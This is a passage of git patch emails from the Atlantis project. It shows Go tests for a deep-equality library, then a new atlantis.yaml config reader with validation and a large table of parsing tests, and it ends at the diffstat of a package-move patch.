+	defer func() { deep.CompareUnexportedFields = defaultCompareUnexportedFields }()
+	type fiveFields struct {
+		a int // unexported fields require ^
+		b int
+		c int
+		d int
+		e int
+	}
+	t1 := fiveFields{1, 2, 3, 4, 5}
+	t2 := fiveFields{0, 0, 0, 0, 0}
+	diff = deep.Equal(t1, t2)
+	if diff == nil {
+		t.Fatal("no diffs")
+	}
+	if len(diff) != deep.MaxDiff {
+		t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff)
+	}
+
+	// Same keys, too many diffs
+	m1 := map[int]int{
+		1: 1,
+		2: 2,
+		3: 3,
+		4: 4,
+		5: 5,
+	}
+	m2 := map[int]int{
+		1: 0,
+		2: 0,
+		3: 0,
+		4: 0,
+		5: 0,
+	}
+	diff = deep.Equal(m1, m2)
+	if diff == nil {
+		t.Fatal("no diffs")
+	}
+	if len(diff) != deep.MaxDiff {
+		t.Log(diff)
+		t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff)
+	}
+
+	// Too many missing keys
+	m1 = map[int]int{
+		1: 1,
+		2: 2,
+	}
+	m2 = map[int]int{
+		1: 1,
+		2: 2,
+		3: 0,
+		4: 0,
+		5: 0,
+		6: 0,
+		7: 0,
+	}
+	diff = deep.Equal(m1, m2)
+	if diff == nil {
+		t.Fatal("no diffs")
+	}
+	if len(diff) != deep.MaxDiff {
+		t.Log(diff)
+		t.Errorf("got %d diffs, execpted %d", len(diff), deep.MaxDiff)
+	}
+}
+
+func TestNotHandled(t *testing.T) {
+	a := func(int) {}
+	b := func(int) {}
+	diff := deep.Equal(a, b)
+	if len(diff) > 0 {
+		t.Error("got diffs:", diff)
+	}
+}
+
+func TestStruct(t *testing.T) {
+	type s1 struct {
+		id     int
+		Name   string
+		Number int
+	}
+	sa := s1{
+		id:     1,
+		Name:   "foo",
+		Number: 2,
+	}
+	sb := sa
+	diff := deep.Equal(sa, sb)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	sb.Name = "bar"
+	diff = deep.Equal(sa, sb)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "Name: foo != bar" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	sb.Number = 22
+	diff = deep.Equal(sa, sb)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 2 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "Name: foo != bar" {
+		t.Error("wrong diff:", diff[0])
+	}
+	if diff[1] != "Number: 2 != 22" {
+		t.Error("wrong diff:", diff[1])
+	}
+
+	sb.id = 11
+	diff = deep.Equal(sa, sb)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 2 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "Name: foo != bar" {
+		t.Error("wrong diff:", diff[0])
+	}
+	if diff[1] != "Number: 2 != 22" {
+		t.Error("wrong diff:", diff[1])
+	}
+}
+
+func TestNestedStruct(t *testing.T) {
+	type s2 struct {
+		Nickname string
+	}
+	type s1 struct {
+		Name  string
+		Alias s2
+	}
+	sa := s1{
+		Name:  "Robert",
+		Alias: s2{Nickname: "Bob"},
+	}
+	sb := sa
+	diff := deep.Equal(sa, sb)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	sb.Alias.Nickname = "Bobby"
+	diff = deep.Equal(sa, sb)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "Alias.Nickname: Bob != Bobby" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestMap(t *testing.T) {
+	ma := map[string]int{
+		"foo": 1,
+		"bar": 2,
+	}
+	mb := map[string]int{
+		"foo": 1,
+		"bar": 2,
+	}
+	diff := deep.Equal(ma, mb)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(ma, ma)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	mb["foo"] = 111
+	diff = deep.Equal(ma, mb)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "map[foo]: 1 != 111" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	delete(mb, "foo")
+	diff = deep.Equal(ma, mb)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "map[foo]: 1 != <does not have key>" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	diff = deep.Equal(mb, ma)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "map[foo]: <does not have key> != 1" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	var mc map[string]int
+	diff = deep.Equal(ma, mc)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	// handle hash order randomness
+	if diff[0] != "map[foo:1 bar:2] != <nil map>" && diff[0] != "map[bar:2 foo:1] != <nil map>" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	diff = deep.Equal(mc, ma)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "<nil map> != map[foo:1 bar:2]" && diff[0] != "<nil map> != map[bar:2 foo:1]" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestArray(t *testing.T) {
+	a := [3]int{1, 2, 3}
+	b := [3]int{1, 2, 3}
+
+	diff := deep.Equal(a, b)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(a, a)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	b[2] = 333
+	diff = deep.Equal(a, b)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "array[2]: 3 != 333" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	c := [3]int{1, 2, 2}
+	diff = deep.Equal(a, c)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "array[2]: 3 != 2" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	var d [2]int
+	diff = deep.Equal(a, d)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "[3]int != [2]int" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	e := [12]int{}
+	f := [12]int{0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10}
+	diff = deep.Equal(e, f)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != deep.MaxDiff {
+		t.Error("not enough diffs:", diff)
+	}
+	for i := 0; i < deep.MaxDiff; i++ {
+		if diff[i] != fmt.Sprintf("array[%d]: 0 != %d", i+1, i+1) {
+			t.Error("wrong diff:", diff[i])
+		}
+	}
+}
+
+func TestSlice(t *testing.T) {
+	a := []int{1, 2, 3}
+	b := []int{1, 2, 3}
+
+	diff := deep.Equal(a, b)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	diff = deep.Equal(a, a)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	b[2] = 333
+	diff = deep.Equal(a, b)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "slice[2]: 3 != 333" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	b = b[0:2]
+	diff = deep.Equal(a, b)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "slice[2]: 3 != <no value>" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	diff = deep.Equal(b, a)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "slice[2]: <no value> != 3" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	var c []int
+	diff = deep.Equal(a, c)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "[1 2 3] != <nil slice>" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	diff = deep.Equal(c, a)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "<nil slice> != [1 2 3]" {
+		t.Error("wrong diff:", diff[0])
+	}
+}
+
+func TestPointer(t *testing.T) {
+	type T struct {
+		i int
+	}
+	a := &T{i: 1}
+	b := &T{i: 1}
+	diff := deep.Equal(a, b)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+
+	a = nil
+	diff = deep.Equal(a, b)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "<nil pointer> != deep_test.T" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	a = b
+	b = nil
+	diff = deep.Equal(a, b)
+	if diff == nil {
+		t.Fatal("no diff")
+	}
+	if len(diff) != 1 {
+		t.Error("too many diff:", diff)
+	}
+	if diff[0] != "deep_test.T != <nil pointer>" {
+		t.Error("wrong diff:", diff[0])
+	}
+
+	a = nil
+	b = nil
+	diff = deep.Equal(a, b)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+}
+
+func TestTime(t *testing.T) {
+	// In an interable kind (i.e. a struct)
+	type sTime struct {
+		T time.Time
+	}
+	now := time.Now()
+	got := sTime{T: now}
+	expect := sTime{T: now.Add(1 * time.Second)}
+	diff := deep.Equal(got, expect)
+	if len(diff) != 1 {
+		t.Error("expected 1 diff:", diff)
+	}
+
+	// Directly
+	a := now
+	b := now
+	diff = deep.Equal(a, b)
+	if len(diff) > 0 {
+		t.Error("should be equal:", diff)
+	}
+}
+
+func TestInterface(t *testing.T) {
+	a := map[string]interface{}{
+		"foo": map[string]string{
+			"bar": "a",
+		},
+	}
+	b := map[string]interface{}{
+		"foo": map[string]string{
+			"bar": "b",
+		},
+	}
+	diff := deep.Equal(a, b)
+	if len(diff) == 0 {
+		t.Fatalf("expected 1 diff, got zero")
+	}
+	if len(diff) != 1 {
+		t.Errorf("expected 1 diff, got %d", len(diff))
+	}
+}
+
+func TestInterface2(t *testing.T) {
+	defer func() {
+		if val := recover(); val != nil {
+			t.Fatalf("panic: %v", val)
+		}
+	}()
+
+	a := map[string]interface{}{
+		"bar": 1,
+	}
+	b := map[string]interface{}{
+		"bar": 1.23,
+	}
+	diff := deep.Equal(a, b)
+	if len(diff) == 0 {
+		t.Fatalf("expected 1 diff, got zero")
+	}
+	if len(diff) != 1 {
+		t.Errorf("expected 1 diff, got %d", len(diff))
+	}
+}
+
+func TestInterface3(t *testing.T) {
+	type Value struct{ int }
+	a := map[string]interface{}{
+		"foo": &Value{},
+	}
+	b := map[string]interface{}{
+		"foo": 1.23,
+	}
+	diff := deep.Equal(a, b)
+	if len(diff) == 0 {
+		t.Fatalf("expected 1 diff, got zero")
+	}
+
+	if len(diff) != 1 {
+		t.Errorf("expected 1 diff, got: %s", diff)
+	}
+}
+
+func TestError(t *testing.T) {
+	a := errors.New("it broke")
+	b := errors.New("it broke")
+
+	diff := deep.Equal(a, b)
+	if len(diff) != 0 {
+		t.Fatalf("expected zero diffs, got %d: %s", len(diff), diff)
+	}
+
+	b = errors.New("it fell apart")
+	diff = deep.Equal(a, b)
+	if len(diff) != 1 {
+		t.Fatalf("expected 1 diff, got %d", len(diff))
+	}
+	if diff[0] != "it broke != it fell apart" {
+		t.Errorf("got '%s', expected 'it broke != it fell apart'", diff[0])
+	}
+
+	// Both errors set
+	type tWithError struct {
+		Error error
+	}
+	t1 := tWithError{
+		Error: a,
+	}
+	t2 := tWithError{
+		Error: b,
+	}
+	diff = deep.Equal(t1, t2)
+	if len(diff) != 1 {
+		t.Fatalf("expected 1 diff, got %d", len(diff))
+	}
+	if diff[0] != "Error: it broke != it fell apart" {
+		t.Errorf("got '%s', expected 'Error: it broke != it fell apart'", diff[0])
+	}
+
+	// Both errors nil
+	t1 = tWithError{
+		Error: nil,
+	}
+	t2 = tWithError{
+		Error: nil,
+	}
+	diff = deep.Equal(t1, t2)
+	if len(diff) != 0 {
+		t.Log(diff)
+		t.Fatalf("expected 0 diff, got %d", len(diff))
+	}
+
+	// One error is nil
+	t1 = tWithError{
+		Error: errors.New("foo"),
+	}
+	t2 = tWithError{
+		Error: nil,
+	}
+	diff = deep.Equal(t1, t2)
+	if len(diff) != 1 {
+		t.Log(diff)
+		t.Fatalf("expected 1 diff, got %d", len(diff))
+	}
+	if diff[0] != "Error: *errors.errorString != <nil pointer>" {
+		t.Errorf("got '%s', expected 'Error: *errors.errorString != <nil pointer>'", diff[0])
+	}
+}
+
+func TestNil(t *testing.T) {
+	type student struct {
+		name string
+		age  int
+	}
+
+	mark := student{"mark", 10}
+	var someNilThing interface{} = nil
+	diff := deep.Equal(someNilThing, mark)
+	if diff == nil {
+		t.Error("Nil value to comparision should not be equal")
+	}
+	diff = deep.Equal(mark, someNilThing)
+	if diff == nil {
+		t.Error("Nil value to comparision should not be equal")
+	}
+	diff = deep.Equal(someNilThing, someNilThing)
+	if diff != nil {
+		t.Error("Nil value to comparision should not be equal")
+	}
+}

From 42b6646cbe82005b3da4af856f492009f7fd8029 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sat, 24 Mar 2018 18:50:01 -0700
Subject: [PATCH 07/69] Implement config reader and parser

---
 server/events/repoconfig/reader.go      |  71 +++
 server/events/repoconfig/reader_test.go | 612 ++++++++++++++++++++++++
 2 files changed, 683 insertions(+)
 create mode 100644 server/events/repoconfig/reader.go
 create mode 100644 server/events/repoconfig/reader_test.go

diff --git a/server/events/repoconfig/reader.go b/server/events/repoconfig/reader.go
new file mode 100644
index 0000000000..77d4e505dc
--- /dev/null
+++ b/server/events/repoconfig/reader.go
@@ -0,0 +1,71 @@
+package repoconfig
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/pkg/errors"
+	"gopkg.in/yaml.v2"
+)
+
+const AtlantisYAMLFilename = "atlantis.yaml"
+const PlanStageName = "plan"
+const ApplyStageName = "apply"
+
+type Reader struct{}
+
+// ReadConfig returns the parsed and validated config for repoDir.
+// If there was no config, it returns a nil pointer. If there was an error
+// in parsing it returns the error.
+func (r *Reader) ReadConfig(repoDir string) (*RepoConfig, error) {
+	configFile := filepath.Join(repoDir, AtlantisYAMLFilename)
+	configData, err := ioutil.ReadFile(configFile)
+
+	// If the file doesn't exist return nil.
+	if err != nil && os.IsNotExist(err) {
+		return nil, nil
+	}
+
+	// If it exists but we couldn't read it return an error.
+	if err != nil {
+		return nil, errors.Wrapf(err, "unable to read %s file", AtlantisYAMLFilename)
+	}
+
+	// If the config file exists, parse it.
+	config, err := r.parseAndValidate(configData)
+	if err != nil {
+		return nil, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename)
+	}
+	return &config, err
+}
+
+func (r *Reader) parseAndValidate(configData []byte) (RepoConfig, error) {
+	var repoConfig RepoConfig
+	if err := yaml.UnmarshalStrict(configData, &repoConfig); err != nil {
+		// Unmarshal error messages aren't fit for user output. We need to
+		// massage them.
+		// todo: fix "field autoplan not found in struct repoconfig.alias" errors
+		return repoConfig, errors.New(strings.Replace(err.Error(), " into repoconfig.RepoConfig", "", -1))
+	}
+
+	// Validate version.
+	if repoConfig.Version != 2 {
+		// todo: this will fail old atlantis.yaml files, we should deal with them in a better way.
+		return repoConfig, errors.New("unknown version: must have \"version: 2\" set")
+	}
+
+	// Validate projects.
+	if len(repoConfig.Projects) == 0 {
+		return repoConfig, errors.New("'projects' key must exist and contain at least one element")
+	}
+
+	for i, project := range repoConfig.Projects {
+		if project.Dir == "" {
+			return repoConfig, fmt.Errorf("project at index %d invalid: dir key must be set and non-empty", i)
+		}
+	}
+	return repoConfig, nil
+}
diff --git a/server/events/repoconfig/reader_test.go b/server/events/repoconfig/reader_test.go
new file mode 100644
index 0000000000..20e36c9cf6
--- /dev/null
+++ b/server/events/repoconfig/reader_test.go
@@ -0,0 +1,612 @@
+package repoconfig_test
+
+import (
+	"io/ioutil"
+	"path/filepath"
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/repoconfig"
+	. "github.com/runatlantis/atlantis/testing"
+)
+
+func TestReadConfig_DirDoesNotExist(t *testing.T) {
+	r := repoconfig.Reader{}
+	conf, err := r.ReadConfig("/not/exist")
+	Ok(t, err)
+	Assert(t, conf == nil, "exp nil ptr")
+}
+
+func TestReadConfig_FileDoesNotExist(t *testing.T) {
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	r := repoconfig.Reader{}
+	conf, err := r.ReadConfig(tmpDir)
+	Ok(t, err)
+	Assert(t, conf == nil, "exp nil ptr")
+}
+
+func TestReadConfig_BadPermissions(t *testing.T) {
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
+	Ok(t, err)
+
+	r := repoconfig.Reader{}
+	_, err = r.ReadConfig(tmpDir)
+	ErrContains(t, "unable to read atlantis.yaml file: ", err)
+}
+
+func TestReadConfig_UnmarshalErrors(t *testing.T) {
+	// We only have a few cases here because we assume the YAML library to be
+	// well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
+	cases := []struct {
+		description string
+		input       string
+		expErr      string
+	}{
+		{
+			"random characters",
+			"slkjds",
+			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds`",
+		},
+		{
+			"just a colon",
+			":",
+			"parsing atlantis.yaml: yaml: did not find expected key",
+		},
+	}
+
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+			Ok(t, err)
+			r := repoconfig.Reader{}
+			_, err = r.ReadConfig(tmpDir)
+			ErrEquals(t, c.expErr, err)
+		})
+	}
+}
+
+func TestReadConfig_Invalid(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		expErr      string
+	}{
+		// Invalid version.
+		{
+			description: "no version",
+			input: `projects:
+- dir: "."
+`,
+			expErr: "unknown version: must have \"version: 2\" set",
+		},
+		{
+			description: "unsupported version",
+			input: `version: 0
+projects:
+- dir: "."
+`,
+			expErr: "unknown version: must have \"version: 2\" set",
+		},
+		{
+			description: "empty version",
+			input: `version: ~
+projects:
+- dir: "."
+`,
+			expErr: "unknown version: must have \"version: 2\" set",
+		},
+
+		// No projects specified.
+		{
+			description: "no projects key",
+			input:       `version: 2`,
+			expErr:      "'projects' key must exist and contain at least one element",
+		},
+		{
+			description: "empty projects list",
+			input: `version: 2
+projects:`,
+			expErr: "'projects' key must exist and contain at least one element",
+		},
+
+		// Project must have dir set.
+		{
+			description: "project with no config",
+			input: `version: 2
+projects:
+-`,
+			expErr: "project at index 0 invalid: dir key must be set and non-empty",
+		},
+		{
+			description: "project without dir set",
+			input: `version: 2
+projects:
+- workspace: "staging"`,
+			expErr: "project at index 0 invalid: dir key must be set and non-empty",
+		},
+		{
+			description: "project with dir set to empty string",
+			input: `version: 2
+projects:
+- dir: ""`,
+			expErr: "project at index 0 invalid: dir key must be set and non-empty",
+		},
+		{
+			description: "project with no config at index 1",
+			input: `version: 2
+projects:
+- dir: "."
+-`,
+			expErr: "project at index 1 invalid: dir key must be set and non-empty",
+		},
+		//		{
+		//			"project with unknown key",
+		//			`version: 2
+		//projects:
+		//- unknown: value`,
+		//			// todo: fix this test case
+		//			"project at index 1 invalid: dir key must be set and non-empty",
+		//		},
+		// todo: more test cases
+
+		// project workflow doesn't exist
+		// workflow has plan and apply keys (otherwise no point specifying it)
+		// plan/apply stages must have non-empty steps key
+
+		// Test the steps key.
+		{
+			description: "unsupported step type",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - unsupported`,
+			expErr: "unsupported step type: \"unsupported\"",
+		},
+
+		// Init step.
+		{
+			description: "unsupported arg to init step",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - init:
+          extra_args: ["hi"]
+          hi: bye
+`,
+			expErr: "unsupported key \"hi\" for step init – the only supported key is extra_args",
+		},
+		{
+			description: "invalid value type to init step's extra_args",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - init:
+          extra_args: arg
+`,
+			expErr: "expected array of strings as value of extra_args, not \"arg\"",
+		},
+
+		// Plan step.
+		{
+			description: "unsupported arg to plan step",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - plan:
+          extra_args: ["hi"]
+          hi: bye
+`,
+			expErr: "unsupported key \"hi\" for step plan – the only supported key is extra_args",
+		},
+		{
+			description: "invalid value type to plan step's extra_args",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - plan:
+          extra_args: arg
+`,
+			expErr: "expected array of strings as value of extra_args, not \"arg\"",
+		},
+
+		// Apply step.
+		{
+			description: "unsupported arg to apply step",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - apply:
+          extra_args: ["hi"]
+          hi: bye
+`,
+			expErr: "unsupported key \"hi\" for step apply – the only supported key is extra_args",
+		},
+		{
+			description: "invalid value type to apply step's extra_args",
+			input: `
+version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - apply:
+          extra_args: arg
+`,
+			expErr: "expected array of strings as value of extra_args, not \"arg\"",
+		},
+	}
+
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+			Ok(t, err)
+
+			r := repoconfig.Reader{}
+			_, err = r.ReadConfig(tmpDir)
+			ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
+		})
+	}
+}
+
+func TestReadConfig_Successes(t *testing.T) {
+	basicProjects := []repoconfig.Project{
+		{
+			AutoPlan: &repoconfig.AutoPlan{
+				Enabled:      true,
+				WhenModified: []string{"**/*.tf"},
+			},
+			Workspace:         "default",
+			TerraformVersion:  "",
+			ApplyRequirements: nil,
+			Workflow:          "",
+			Dir:               ".",
+		},
+	}
+
+	cases := []struct {
+		description string
+		input       string
+		expOutput   repoconfig.RepoConfig
+	}{
+		{
+			description: "uses project defaults",
+			input: `version: 2
+projects:
+- dir: "."`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+			},
+		},
+		{
+			description: "autoplan is enabled by default",
+			input: `version: 2
+projects:
+- dir: "."
+  auto_plan:
+    when_modified: ["**/*.tf"]
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+			},
+		},
+		{
+			description: "if workflows not defined, there are none",
+			input: `version: 2
+projects:
+- dir: "."
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+			},
+		},
+		{
+			description: "if workflows key set but with no workflows there are none",
+			input: `version: 2
+projects:
+- dir: "."
+workflows: ~
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+			},
+		},
+		{
+			description: "if a workflow is defined but set to null we use the defaults",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default: ~
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "init",
+								},
+								{
+									StepType: "plan",
+								},
+							},
+						},
+						Apply: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "apply",
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "if a plan or apply has no steps defined then we use the defaults",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+    apply:
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "init",
+								},
+								{
+									StepType: "plan",
+								},
+							},
+						},
+						Apply: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "apply",
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "if a plan or apply has no steps defined then we use the defaults",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+    apply:
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "init",
+								},
+								{
+									StepType: "plan",
+								},
+							},
+						},
+						Apply: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "apply",
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+    apply:
+      steps:
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: nil,
+						},
+						Apply: &repoconfig.Stage{
+							Steps: nil,
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+    apply:
+      steps:
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: nil,
+						},
+						Apply: &repoconfig.Stage{
+							Steps: nil,
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "if steps are set then we parse them properly",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - init
+    apply:
+      steps:
+      - plan # we don't validate if they make sense
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "init",
+								},
+							},
+						},
+						Apply: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType: "plan",
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+		{
+			description: "we parse extra_args for the steps",
+			input: `version: 2
+projects:
+- dir: "."
+workflows:
+  default:
+    plan:
+      steps:
+      - init:
+          extra_args: []
+    apply:
+      steps:
+      - plan:
+          extra_args: ["a", "b"]
+`,
+			expOutput: repoconfig.RepoConfig{
+				Version:  2,
+				Projects: basicProjects,
+				Workflows: map[string]repoconfig.Workflow{
+					"default": {
+						Plan: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType:  "init",
+									ExtraArgs: nil,
+								},
+							},
+						},
+						Apply: &repoconfig.Stage{
+							Steps: []repoconfig.StepConfig{
+								{
+									StepType:  "plan",
+									ExtraArgs: []string{"a", "b"},
+								},
+							},
+						},
+					},
+				},
+			},
+		},
+	}
+
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+			Ok(t, err)
+
+			r := repoconfig.Reader{}
+			act, err := r.ReadConfig(tmpDir)
+			Ok(t, err)
+			Equals(t, &c.expOutput, act)
+		})
+	}
+}

From 75a55dd6967fb04f33fac4cb788f361db1eff5ea Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Sat, 24 Mar 2018 18:51:33 -0700
Subject: [PATCH 08/69] Moved into new package

---
 server/events/atlantisyaml/init_step.go       | 32 -----------
 .../apply_step.go                             | 12 ++---
 .../apply_step_test.go                        | 33 +++++-------
 server/events/repoconfig/init_step.go         | 20 +++++++
 .../init_step_test.go                         | 12 ++---
 .../{atlantisyaml => repoconfig}/plan_step.go | 15 +++---
 .../plan_step_test.go                         | 54 +++++++++----------
 7 files changed, 76 insertions(+), 102 deletions(-)
 delete mode 100644 server/events/atlantisyaml/init_step.go
 rename server/events/{atlantisyaml => repoconfig}/apply_step.go (62%)
 rename server/events/{atlantisyaml => repoconfig}/apply_step_test.go (74%)
 create mode 100644 server/events/repoconfig/init_step.go
